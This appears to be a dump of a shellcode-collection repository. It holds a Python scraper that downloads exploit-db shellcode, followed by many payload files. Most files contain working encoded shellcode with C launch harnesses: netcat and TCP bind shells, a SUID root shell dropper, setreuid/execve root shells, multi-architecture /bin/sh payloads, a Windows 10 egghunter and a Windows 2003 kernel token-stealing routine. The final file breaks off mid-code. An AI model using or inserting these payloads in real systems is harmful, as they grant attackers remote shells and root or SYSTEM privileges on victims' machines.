"\x68\x6e\x1c\x4a\x0e" // push $0x0e4a1c6e 23 | "\x68\x06\x5b\x16\x04" // push $0x04165b06 24 | 25 | // 26 | // <_unpack_loop>: 27 | // 28 | 29 | "\x31\x0c\x24" // xor %ecx,(%esp) 30 | "\x5a" // pop %edx 31 | "\x75\xfa" // jne <_unpack_loop> 32 | "\x83\xec\x18" // sub $0x18,%esp 33 | "\x54" // push %esp 34 | "\xc3"; // ret 35 | 36 | int main(int argc, char **argv) { 37 | int *ret; 38 | ret = (int *)&ret + 2; 39 | (*ret) = (int) shellcode; 40 | } 41 | 42 | // milw0rm.com [2006-01-25] -------------------------------------------------------------------------------- /Linux/Linux_-_Bind_Netcat_Shell__31337_TCP__Polymorphic_Shellcode__91_bytes___Shellcode_exploit_for_Linux_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title : nc -lp 31337 -e /bin//sh polymorphic linux shellcode . 3 | Name : 91 bytes nc -lp 31337 -e /bin//sh polymorphic linux shellcode . 4 | Date : Mon Jul 5 16:58:50 WIT 2010 5 | Author : gunslinger_ 6 | Web : http://devilzc0de.org 7 | blog : http://gunslingerc0de.wordpress.com 8 | tested on : linux debian 9 | special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com) 10 | greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !! 11 | */ 12 | 13 | #include 14 | 15 | char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x43\x80\x6c\x0e\xff\x35\x80\xe9\x01" 16 | "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x95\x66\xf5\x66\x07\xe5" 17 | "\x40\x87\x9d\xa3\x64\xa8\x9d\x9d\x64\x64\x97\x9e\xbe\x18\x87" 18 | "\x9d\x62\x98\x98\x98\xbe\x16\x87\x20\x3c\x86\x88\xbe\x16\x02" 19 | "\xb5\x96\x1d\x29\x34\x34\x34\xa3\x98\x55\x62\xa1\xa5\x55\x68" 20 | "\x66\x68\x68\x6c\x55\x62\x9a\x55\x64\x97\x9e\xa3\x64\x64\xa8" 21 | "\x9d"; 22 | 23 | int main(void) 24 | { 25 | fprintf(stdout,"Length: %d\n",strlen(shellcode)); 26 | (*(void(*)()) shellcode)(); 27 | } -------------------------------------------------------------------------------- /Linux/Linux_-_Bind_TCP_Shell__6778_TCP__XOR_Encoded_Polymorphic_Shellcode__125_bytes___Shellcode_exploit_for_Linux_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title : bind port to 6678 XOR encoded polymorphic linux shellcode . 3 | Name : 125 bind port to 6678 XOR encoded polymorphic linux shellcode . 4 | Date : Tue Jul 6 01:52:33 WIT 2010 5 | Author : gunslinger_ 6 | Web : http://devilzc0de.org 7 | blog : http://gunslingerc0de.wordpress.com 8 | tested on : linux debian 9 | special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com) 10 | greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !! 11 | */ 12 | 13 | #include 14 | 15 | char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x74\x0e\xff" 16 | "\x0a\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff" 17 | "\xff\xff\x3b\xca\x3b\xd1\x3b\xd8\x5a\x60\x0b" 18 | "\x60\x08\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83" 19 | "\xcc\x58\x62\xb1\x08\x10\x70\x83\xeb\x60\x1a" 20 | "\x5b\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x58" 21 | "\x5c\x83\xeb\xb9\x0e\xba\x6c\xc7\x8a\x58\x58" 22 | "\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83\xc9" 23 | "\x3b\xc3\xba\x35\xc7\x8a\x4b\xba\x35\xc7\x8a" 24 | "\x4b\xba\x35\xc7\x8a\x58\x62\x25\x25\x79\x62" 25 | "\x62\x25\x68\x63\x64\x83\xe9\x58\x59\x83\xeb" 26 | "\xba\x01\xc7\x8a"; 27 | 28 | 29 | int main(void) 30 | { 31 | fprintf(stdout,"Length: %d\n",strlen(shellcode)); 32 | (*(void(*)()) shellcode)(); 33 | } -------------------------------------------------------------------------------- /Linux/Linux_-_Find_All_Writeable_Folder_In_FileSystem_Polymorphic_Shellcode__91_bytes___Shellcode_exploit_for_Linux_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title : Find all writeable folder in filesystem linux polymorphic shellcode . 3 | Name : 91 bytes Find all writeable folder in filesystem linux polymorphic shellcode . 4 | Date : Sat Jun 17 21:27:03 2010 5 | Author : gunslinger_ 6 | Web : http://devilzc0de.org 7 | blog : http://gunslingerc0de.wordpress.com 8 | tested on : linux debian 9 | special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com) 10 | greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !! 11 | */ 12 | 13 | #include 14 | 15 | char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x43\x80\x6c\x0e\xff\x35\x80\xe9\x01" 16 | "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x95\x66\xf5\x66\x07\xe5" 17 | "\x40\x87\x9d\xa3\x64\xa8\x9d\x9d\x64\x64\x97\x9e\xbe\x18\x87" 18 | "\x9d\x62\x98\x98\x98\xbe\x16\x87\x20\x3c\x86\x88\xbe\x16\x02" 19 | "\xb5\x96\x1d\x29\x34\x34\x34\x9b\x9e\xa3\x99\x55\x64\x55\x62" 20 | "\xa9\xae\xa5\x9a\x55\x99\x55\x62\xa5\x9a\xa7\xa2\x55\x6c\x6c" 21 | "\x6c"; 22 | 23 | int main(void) 24 | { 25 | fprintf(stdout,"Length: %d\n",strlen(shellcode)); 26 | (*(void(*)()) shellcode)(); 27 | } -------------------------------------------------------------------------------- /Linux/Linux_-_Write_SUID_Root_Shell___tmp__hiddenshell__Polymorphic_Shellcode__161_bytes___Shellcode_exploit_for_Linux_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Author : gunslinger_ 3 | Web : http://devilzc0de.org 4 | blog : http://gunslingerc0de.wordpress.com 5 | tested on : linux debian 6 | special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (exploit-db.com) 7 | greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !! 8 | */ 9 | 10 | #include 11 | 12 | char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x89\x80\x6c\x0e\xff\x35\x80\xe9\x01" 13 | "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x95\x66\xf5\x66\x07\xe5" 14 | "\x40\x87\x9d\xa3\x64\xa8\x9d\x9d\x64\x64\x97\x9e\xbe\x18\x87" 15 | "\x9d\x62\x98\x98\x98\xbe\x16\x87\x20\x3c\x86\x88\xbe\x16\x02" 16 | "\xb5\x96\x1d\x29\x34\x34\x34\x98\xa5\x55\x64\x97\x9e\xa3\x64" 17 | "\x64\xa8\x9d\x55\x64\xa9\xa2\xa5\x64\x63\x9d\x9e\x99\x99\x9a" 18 | "\xa3\xa8\x9d\x9a\xa1\xa1\x70\x55\x98\x9d\xa4\xac\xa3\x55\xa7" 19 | "\xa4\xa4\xa9\x6f\xa7\xa4\xa4\xa9\x55\x64\xa9\xa2\xa5\x64\x63" 20 | "\x9d\x9e\x99\x99\x9a\xa3\xa8\x9d\x9a\xa1\xa1\x70\x55\x98\x9d" 21 | "\xa2\xa4\x99\x55\x69\x6c\x6a\x6a\x55\x64\xa9\xa2\xa5\x64\x63" 22 | "\x9d\x9e\x99\x99\x9a\xa3\xa8\x9d\x9a\xa1\xa1"; 23 | 24 | int main(void) 25 | { 26 | fprintf(stdout,"Length: %d\n",strlen(shellcode)); 27 | (*(void(*)()) shellcode)(); 28 | } -------------------------------------------------------------------------------- /Linux/Linux_-_setreuid_0,0__+_execve___bin_sh_,NULL,NULL__XOR_Encoded_Shellcode__62_bytes___Shellcode_exploit_for_Linux_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Author : gunslinger_ 3 | Web : http://devilzc0de.org 4 | blog : http://gunslingerc0de.wordpress.com 5 | tested on : linux debian 6 | special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com) 7 | greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !! 8 | */ 9 | 10 | #include 11 | 12 | char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x26\x80\x74\x0e\xff\x01" 13 | "\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff" 14 | "\x30\xc1\x30\xda\x30\xc8\x30\xd3\xb1\x47\x30\xda" 15 | "\x30\xc8\xcc\x81\xb1\x0a\x52\x69\x2e\x2e\x72\x69" 16 | "\x69\x2e\x63\x68\x6f\x88\xe2\x30\xc8\x30\xc8\x52" 17 | "\xcc\x81"; 18 | 19 | int main(void) 20 | { 21 | fprintf(stdout,"Length: %d\n",strlen(shellcode)); 22 | (*(void(*)()) shellcode)(); 23 | } -------------------------------------------------------------------------------- /Multiple/BSD_x86___Linux_x86_-_execve__bin_sh_Shellcode__38_bytes___Shellcode_exploit_for_Multiple_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Linux/x86 and Bsd/x86 3 | * 4 | * execve() of /bin/sh by dymitri!!! 5 | * 6 | */ 7 | 8 | 9 | 10 | #include 11 | char 12 | code[] = 13 | "\x31\xc0" 14 | "\x50" 15 | "\x68\x2f\x2f\x73\x68" 16 | "\x68\x2f\x62\x69\x6e" 17 | "\x89\xe3" 18 | "\x50" 19 | "\x54" 20 | "\x53" 21 | "\x50" 22 | "\x8c\xe0" 23 | "\x21\xc0" 24 | "\x74\x04" 25 | "\xb0\x3b" 26 | "\xeb\x07" /* si es bsd saltamos los 7 bytes para llegar al int $0x80 */ 27 | "\xb0\x0b" 28 | "\x99" /* En caso contrario si %fs es igual a 0 configuramos para que la ejecucion sea sobre linux */ 29 | "\x52" 30 | "\x53" 31 | "\x89\xe1" 32 | "\xcd\x80"; 33 | main() 34 | { 35 | void (*s)() = (void *)code; 36 | printf("Shellcode length: %d\nExecuting..\n\n", 37 | strlen(code)); 38 | s(); 39 | } 40 | 41 | // milw0rm.com [2004-09-12] -------------------------------------------------------------------------------- /Multiple/Linux_PPC___Linux_x86_-_execve___bin_sh_,___bin_sh_,NULL_,NULL__Shellcode__99_bytes___Shellcode_exploit_for_Multiple_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * -[ dual-linux.c ]- 3 | * by core@bokeoa.com (ripped from nemo@felinemenace.org) 4 | * ^-- much <3 brotha ;) 5 | * 6 | * execve("/bin/sh",{"/bin/sh",NULL},NULL) shellcode for linux (both the ppc 7 | * and x86 version.) I thought about adding mipsel but I don't feel up to it 8 | * at the moment. In fact I feel like crap... 9 | * 10 | * Shoutz to nemo, andrewg, KF, ghandi, phased, MRX, Blue Boar, Solar Eclipse, 11 | * HDM, FX, Max Vision, MaXx, c0ntex, izik, xort, banned-it, hoglund, SkyLined, 12 | * Gera, Stealth (7350), Emmanuel, Hackademy, Raptor (0xdeadbeef), sh0k, jduck, 13 | * xfocus, LSD, ADM, b10z, 0dd, ES, runixd, packy, norse, mXn, thn, dragnet, 14 | * hdm, fozzy, str0ke, B|ueberry, , rjohnson, Kaliman, capsyl, salvia, 15 | * amnesia, arcanum, eazyass, loophole, my family and so any others... 16 | * 17 | * irc.pulltheplug.org #social 18 | * 19 | * peace ~ metta ~ 20 | * 21 | * References: 22 | * http://milw0rm.com/id.php?id=1318 23 | * http://www.phrack.org/phrack/57/p57-0x0e 24 | */ 25 | 26 | char dual_linux[] = 27 | // 28 | // These four bytes work out to the following instruction 29 | // in ppc arch: "rlwnm r16,r28,r29,13,4", which will 30 | // basically do nothing on osx/ppc. 31 | // 32 | // However on x86 architecture the four bytes are 3 33 | // instructions: 34 | // 35 | // "push/nop/jmp" 36 | // 37 | // In this way, execution will be taken to the x86 shellcode 38 | // on an x86 machine, and the ppc shellcode when running 39 | // on a ppc architecture machine. 40 | // 41 | "\x5f\x90\xeb\x48" 42 | 43 | "\x69\x69\x69\x69" /*nop*/ 44 | "\x69\x69\x69\x69" /*nop*/ 45 | "\x69\x69\x69\x69" /*nop*/ 46 | // linux/ppc execve /bin/sh by Charles Stevenson (core) 47 | "\x7c\x3f\x0b\x78" /*mr r31,r1 # optional instruction */ 48 | "\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/ 49 | "\x42\x40\xff\xf9" /*bdzl+ 10000454
*/ 50 | "\x7f\x08\x02\xa6" /*mflr r24*/ 51 | "\x3b\x18\x01\x34" /*addi r24,r24,308*/ 52 | "\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/ 53 | "\x38\x78\xfe\xf4" /*addi r3,r24,-268*/ 54 | "\x90\x61\xff\xf8" /*stw r3,-8(r1)*/ 55 | "\x38\x81\xff\xf8" /*addi r4,r1,-8*/ 56 | "\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/ 57 | "\x3b\xc0\x01\x60" /*li r30,352*/ 58 | "\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/ 59 | "\x44\xde\xad\xf2" /*.long 0x44deadf2*/ 60 | "/bin/shZ" // the last byte becomes NULL 61 | 62 | // lnx_binsh4.c - v1 - 23 Byte /bin/sh sysenter Opcode Array Payload 63 | // Copyright(c) 2005 c0ntex 64 | // Copyright(c) 2005 BaCkSpAcE 65 | "\x6a\x0b\x58\x99\x52\x68\x2f\x2f" 66 | "\x73\x68\x68\x2f\x62\x69\x6e\x54" 67 | "\x5b\x52\x53\x54\x59\x0f\x34"; 68 | 69 | int main(int ac, char **av) 70 | { 71 | void (*fp)() = dual_linux; 72 | fp(); 73 | } 74 | 75 | // in loving memory of hack.co.za 76 | 77 | // milw0rm.com [2005-11-15] -------------------------------------------------------------------------------- /Multiple/Linux_x86___Unix_SPARC_-_execve__bin_sh_Shellcode__80_bytes___Shellcode_exploit_for_Multiple_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Linux/x86 and Unix/Sparc 3 | * 4 | * execve() of /bin/sh by dymitri!!! 5 | * 6 | */ 7 | 8 | #include 9 | 10 | char wcode[]= 11 | 12 | "\x90\x90\xeb\x34\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" 13 | "\xa2\x14\x63\x68\xe0\x3b\xbf\xf0\xc0\x23\xbf\xf8\x90\x23\xa0\x10" 14 | "\xc0\x23\xbf\xec\xd0\x23\xbf\xe8\x92\x23\xa0\x18\x94\x22\x80\x0a" 15 | "\x82\x10\x20\x3b\x91\xd0\x20\x08" 16 | "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; 17 | 18 | main() 19 | { 20 | void (*s)() = (void *)wcode; 21 | printf("MULtiplataforma: %d\n\n", 22 | strlen(wcode)); 23 | s(); 24 | } 25 | 26 | // milw0rm.com [2004-09-12] -------------------------------------------------------------------------------- /Multiple/Linux_x86___Unix_SPARC___IRIX_MIPS_-_execve__bin_sh_Shellcode__141_bytes___Shellcode_exploit_for_Multiple_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode ejecuta execve /bin/sh en Irix/mips, Linux/x86, Unix/sparc by dymitr1 3 | dymitri666@hotmail.com 4 | */ 5 | 6 | #include 7 | 8 | char code[]= 9 | "\x37\x37\xeb\x2f\x30\x80\x00\x12\x04\x10\xff\xff\x24\x02\x03\xf3\x23\xff\x02\x14\x23\xe4\xfe\x08" 10 | "\x23\xe5\xfe\x10\xaf\xe4\xfe\x10\xaf\xe0\xfe\x14\xa3\xe0\xfe\x0f" 11 | "\x03\xff\xff\xcc" 12 | "/bin/sh" 13 | "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" 14 | "\x37\x37\x37\x37\x37" 15 | "\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc\xa2\x14\x63\x68" 16 | "\xe0\x3b\xbf\xf0\xc0\x23\xbf\xf8\x90\x23\xa0\x10\xc0\x23\xbf\xec" 17 | "\xd0\x23\xbf\xe8\x92\x23\xa0\x18\x94\x22\x80\x0a\x82\x10\x20\x3b" 18 | "\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08"; 19 | main() 20 | { 21 | void (*s)() = (void *)code; 22 | printf("Shellcode length: %d\nExecuting..\n\n", 23 | strlen(code)); 24 | s(); 25 | } 26 | 27 | // milw0rm.com [2004-09-12] -------------------------------------------------------------------------------- /Multiple/OSX_PPC___OSX_x86_-_execve___bin_sh_,___bin_sh_,NULL_,NULL__Shellcode__121_bytes___Shellcode_exploit_for_Multiple_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * -[ dual.c ]- 3 | * by nemo@felinemenace.org 4 | * 5 | * execve("/bin/sh",{"/bin/sh",NULL},NULL) shellcode 6 | * for osx (both the ppc and x86 version.) 7 | * 8 | * Sample output: 9 | * 10 | * -[nemo@squee:~/shellcode]$ file dual-ppc 11 | * dual-ppc: Mach-O executable ppc 12 | * -[nemo@squee:~/shellcode]$ ./dual-ppc 13 | * sh-2.05b$ exit 14 | * 15 | * -[nemo@squee:~/shellcode]$ file dual-x86 16 | * dual-x86: Mach-O executable i386 17 | * -[nemo@squee:~/shellcode]$ ./dual-x86 18 | * sh-2.05b$ exit 19 | */ 20 | 21 | char dual[] = 22 | // 23 | // These four bytes work out to the following instruction 24 | // in ppc arch: "rlwnm r16,r28,r29,13,4", which will 25 | // basically do nothing on osx/ppc. 26 | // 27 | // However on x86 architecture the four bytes are 3 28 | // instructions: 29 | // 30 | // "push/nop/jmp" 31 | // 32 | // In this way, execution will be taken to the x86 shellcode 33 | // on an x86 machine, and the ppc shellcode when running 34 | // on a ppc architecture machine. 35 | // 36 | "\x5f\x90\xeb\x48" 37 | 38 | // ppc execve() code by b-r00t 39 | "\x7c\xa5\x2a\x79\x40\x82\xff\xfd" 40 | "\x7d\x68\x02\xa6\x3b\xeb\x01\x70" 41 | "\x39\x40\x01\x70\x39\x1f\xfe\xcf" 42 | "\x7c\xa8\x29\xae\x38\x7f\xfe\xc8" 43 | "\x90\x61\xff\xf8\x90\xa1\xff\xfc" 44 | "\x38\x81\xff\xf8\x38\x0a\xfe\xcb" 45 | "\x44\xff\xff\x02\x7c\xa3\x2b\x78" 46 | "\x38\x0a\xfe\x91\x44\xff\xff\x02" 47 | "\x2f\x62\x69\x6e\x2f\x73\x68\x58" 48 | 49 | // osx86 execve() code by nemo 50 | "\x31\xdb\x6a\x3b\x58\x53\xeb\x18\x5f" 51 | "\x57\x53\x54\x54\x57\x6a\xff\x88\x5f" 52 | "\x07\x89\x5f\xf5\x88\x5f\xfa\x9a\xff" 53 | "\xff\xff\xff\x2b\xff\xe8\xe3\xff\xff" 54 | "\xff/bin/shX"; 55 | 56 | int main(int ac, char **av) 57 | { 58 | void (*fp)() = dual; 59 | fp(); 60 | } 61 | 62 | // milw0rm.com [2005-11-13] -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WangYihang/ShellcodeSpider/55cf38010b85151ddb4ad10edd2f278ec737ec33/README.md -------------------------------------------------------------------------------- /Spider.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding:utf-8 3 | 4 | import requests 5 | import bs4 6 | import time 7 | import sys 8 | import os 9 | 10 | from getItem import run 11 | 12 | def getAllPages(soup): 13 | result = [] 14 | table = soup.find("table", class_="exploit_list bootstrap-wrapper") 15 | tbody = table.find("tbody") 16 | trs = tbody.find_all("tr") 17 | for tr in trs: 18 | temp = tr.find("td", class_="description") 19 | link = temp.find("a")["href"] 20 | result.append(link) 21 | return result 22 | 23 | headers = { 24 | "Host" : "www.exploit-db.com", 25 | "User-Agent" : "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0", 26 | "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 27 | "Accept-Language" : "en-US,en;q=0.5", 28 | "Accept-Encoding" : "gzip, deflate, br", 29 | "Connection" : "keep-alive", 30 | "Upgrade-Insecure-Requests" : "1", 31 | "Pragma" : "no-cache", 32 | "Cache-Control" : "no-cache" 33 | } 34 | 35 | shellcode_types = [ 36 | "Linux", 37 | "Lin_x86", 38 | "Lin_x86-64", 39 | "Windows", 40 | "Win_x86", 41 | "Win_x86-64", 42 | "Multiple", 43 | "Generator" 44 | ] 45 | 46 | command = "git init" 47 | os.system(command) 48 | 49 | for shellcode_type in shellcode_types: 50 | try: 51 | os.makedirs(shellcode_type) 52 | except Exception as e: 53 | print e 54 | url = "https://www.exploit-db.com/shellcode/?order_by=title&order=asc&p=" + shellcode_type 55 | response = requests.get(url, headers=headers) 56 | content = response.text.encode("UTF-8") 57 | soup = bs4.BeautifulSoup(content, "html.parser") 58 | 59 | links = getAllPages(soup) 60 | for link in links: 61 | print "==============================" 62 | print "Handling : " + link 63 | # command = "python ./getItem.py " + link + " " + shellcode_type 64 | run(link, shellcode_type) 65 | # os.system(command) 66 | 67 | -------------------------------------------------------------------------------- /Win_x86-64/Windows_10_x64_-_Egghunter_Shellcode__45_bytes___Shellcode_exploit_for_Win_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | PUBLIC Win10egghunterx64 2 | 3 | .code 4 | 5 | Win10egghunterx64 PROC 6 | 7 | _start: 8 | push 7fh 9 | pop rdi ; RDI is nonvolatile, so it will be preserved after syscalls 10 | 11 | _setup: 12 | inc rdi ; parameter 1 - lpAddress - counter 13 | mov r9b,40h ; parameter 3 - flNewProtect - 0x40 PAGE_EXECUTE_READWRITE 14 | pop rsi ; Stack alignment before the stack setup 15 | pop rsi 16 | push rdi 17 | push rsp 18 | pop rdx ; pointer to lpAddress 19 | push 08h ; parameter 2 - dwSize 0x8 20 | push rsp 21 | pop r8 ; pointer to dwSize going to r8 - can be exchanged with mov r8,rsp 22 | mov [rdx+20h],rsp ; parameter 4 - lpflOldprotect 23 | dec r10 ; parameter 5 - hProcess - the handle will be -1, if not set you'll get a c0000008 error 24 | _VirtualProtectEx: 25 | 26 | push 50h ; 0x50h for Windows 10 and Windows Server 2016 x64, 0x4Dh for Windows 7 family 27 | pop rax 28 | syscall 29 | 30 | _rc_check: 31 | 32 | cmp al,01h ; check the response for non-allocated memory 33 | jge _setup 34 | 35 | _end: ; There won't be too many of these eggs in the memory 36 | 37 | mov eax, 042303042h ; the egg 38 | scasd 39 | jnz _setup 40 | jmp rdi 41 | 42 | Win10egghunterx64 ENDP 43 | END -------------------------------------------------------------------------------- /Win_x86-64/Windows_2003_x64_-_Token_Stealing_Shellcode__59_bytes___Shellcode_exploit_for_Win_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | ;token stealing shellcode Win 2003 x64 2 | ;based on the widely available x86 version 3 | ;syntax for NASM 4 | ;Author: Csaba Fitzl, @theevilbit 5 | 6 | ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 7 | ;important structures and offsets; 8 | ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 9 | 10 | ;kd> dt -r1 nt!_TEB 11 | ; +0x110 SystemReserved1 : [54] Ptr64 Void 12 | ;??????+0x078 KTHREAD <----- NOT DOCUMENTED, can't get it from WINDBG directly 13 | 14 | ;kd> dt -r1 nt!_KTHREAD 15 | ; +0x048 ApcState : _KAPC_STATE 16 | ; +0x000 ApcListHead : [2] _LIST_ENTRY 17 | ; +0x020 Process : Ptr64 _KPROCESS 18 | 19 | ;kd> dt -r1 nt!_EPROCESS 20 | ; +0x0d8 UniqueProcessId : Ptr64 Void 21 | ; +0x0e0 ActiveProcessLinks : _LIST_ENTRY 22 | ; +0x000 Flink : Ptr64 _LIST_ENTRY 23 | ; +0x008 Blink : Ptr64 _LIST_ENTRY 24 | ; +0x160 Token : _EX_FAST_REF 25 | ; +0x000 Object : Ptr64 Void 26 | ; +0x000 RefCnt : Pos 0, 4 Bits 27 | ; +0x000 Value : Uint8B 28 | 29 | BITS 64 30 | 31 | global start 32 | 33 | section .text 34 | 35 | start: 36 | mov rax, [gs:0x188] ;Get current ETHREAD in 37 | mov rax, [rax+0x68] ;Get current EPROCESS address 38 | mov rcx, rax ;Copy current EPROCESS address to RCX 39 | 40 | find_system_process: 41 | mov rax, [rax+0xe0] ;Next EPROCESS ActiveProcessLinks.Flink 42 | sub rax, 0xe0 ;Go to the beginning of the EPROCESS structure 43 | mov r9 , [rax+0xd8] ;Copy PID to R9 44 | cmp r9 , 0x4 ;Compare R9 to SYSTEM PID (=4) 45 | jnz short find_system_process ;If not SYSTEM got to next EPROCESS 46 | 47 | stealing: 48 | mov rdx, [rax+0x160] ;Copy SYSTEM process token address to RDX 49 | mov [rcx+0x160], rdx ;Steal token with overwriting our current process's token address 50 | retn 0x10 51 | 52 | ;byte stream: 53 | ;"\x65\x48\x8b\x04\x25\x88\x01\x00\x00\x48\x8b\x40\x68\x48\x89\xc1" 54 | ;"\x48\x8b\x80\xe0\x00\x00\x00\x48\x2d\xe0\x00\x00\x00\x4c\x8b\x88" 55 | ;"\xd8\x00\x00\x00\x49\x83\xf9\x04\x75\xe6\x48\x8b\x90\x60\x01\x00" 56 | ;"\x00\x48\x89\x91\x60\x01\x00\x00\xc2\x10\x00" -------------------------------------------------------------------------------- /Win_x86-64/Windows_7_Professional_SP1_x64__FR__-_Beep_Shellcode__39_bytes___Shellcode_exploit_for_Win_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | char shellcode[] = 4 | 5 | "\x31\xC9" //xor ecx, ecx 6 | "\x64\x8B\x71\x30" //mov esi, [fs:ecx+0x30] 7 | "\x8B\x76\x0C" //mov esi, [esi+0x0C] 8 | "\x8B\x76\x1C" //mov esi, [esi+0x1c] 9 | "\x8B\x06" //mov eax, [esi] 10 | "\x8B\x68\x08" //mov ebp, [eax+0x08] 11 | "\x68\x11\x11\x11\x11" //push 0x11111111 12 | "\x66\x68\x11\x11" //push word 0x1111 13 | "\x5B" //pop ebx 14 | "\x53" //push ebx 15 | "\x55" //push ebp 16 | "\x5B" //pop ebx 17 | "\x66\x81\xC3\x4B\x85" //add bx, 0x854b 18 | "\xFF\xD3" //call ebx 19 | "\xEB\xEA"; //jmp short 20 | 21 | 22 | int main(int argc, char **argv) { 23 | int *ret; 24 | ret = (int *)&ret + 2; 25 | (*ret) = (int) shellcode; 26 | } -------------------------------------------------------------------------------- /Win_x86-64/Windows_7_x64_-_cmd_Shellcode__61_bytes___Shellcode_exploit_for_Win_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | | Title: Windows Seven x64 (cmd) Shellcode 61 Bytes 3 | | Type: Shellcode 4 | | Author: agix 5 | | Platform: win32 6 | | Info: Tested on Windows Seven Pro Fr, Ultimate En, Premium Home En 7 | */ 8 | 9 | 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 10 | 0 _ __ __ __ 1 11 | 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 12 | 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 13 | 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 14 | 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 15 | 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 16 | 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 17 | 1 \ \____/ >> Exploit database separated by exploit 0 18 | 0 \/___/ type (local, remote, DoS, etc.) 1 19 | 1 1 20 | 0 [+] Site : Inj3ct0r.com 0 21 | 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 22 | 0 0 23 | 1 ################################## 1 24 | 0 I'm agix member from Inj3ct0r Team 1 25 | 1 ################################## 0 26 | 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 27 | 28 | #include 29 | 30 | char shellcode[] = 31 | 32 | "\x31\xC9" //xor ecx,ecx 33 | "\x64\x8B\x71\x30" //mov esi,[fs:ecx+0x30] 34 | "\x8B\x76\x0C" //mov esi,[esi+0xc] 35 | "\x8B\x76\x1C" //mov esi,[esi+0x1c] 36 | "\x8B\x36" //mov esi,[esi] 37 | "\x8B\x06" //mov eax,[esi] 38 | "\x8B\x68\x08" //mov ebp,[eax+0x8] 39 | "\xEB\x20" //jmp short 0x35 40 | "\x5B" //pop ebx 41 | "\x53" //push ebx 42 | "\x55" //push ebp 43 | "\x5B" //pop ebx 44 | 